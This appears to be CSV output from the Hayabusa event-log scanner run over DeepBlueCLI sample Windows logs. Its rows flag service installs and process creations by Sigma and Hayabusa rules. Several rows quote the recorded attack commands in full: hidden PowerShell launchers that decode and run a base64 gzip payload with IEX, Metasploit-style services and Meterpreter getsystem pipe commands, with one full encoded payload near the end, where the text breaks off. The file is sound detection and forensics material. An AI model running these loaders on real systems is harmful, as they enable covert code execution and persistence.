4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:59:41.659 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:59:41.659 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 
4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:59:41.676 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.676 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command 
Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.676 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.676 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.680 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd2c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.680 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.680 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command 
Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.680 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.680 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.680 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.854 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.854 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.854 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-09-19 20:59:41.854 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.854 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:00:23.453 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:00:23.453 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:00:23.453 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:00:23.493 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:00:23.493 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:00:23.493 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal 
Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:00:33.473 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:00:33.590 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:06:33.654 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:08:05.647 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:08:05.647 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:08:05.647 
+00:00,IE10Win7,7045,info,Persis,Service Installed,Name: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:08:05.672 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:08:05.672 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:08:05.672 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:12:10.677 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:12:10.677 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:12:10.677 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:12:10.682 
+00:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:12:10.682 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:12:10.682 +00:00,IE10Win7,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:12:45.349 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:12:45.349 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:12:45.349 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:12:45.385 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without 
Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:12:45.385 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:12:45.385 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:13:04.090 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:13:04.090 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:13:04.090 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:13:04.094 +00:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 
21:13:04.094 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:13:04.094 +00:00,IE10Win7,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.125 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:23:37.125 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:23:37.125 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:23:37.132 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x294 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.132 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.132 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.132 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.135 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuE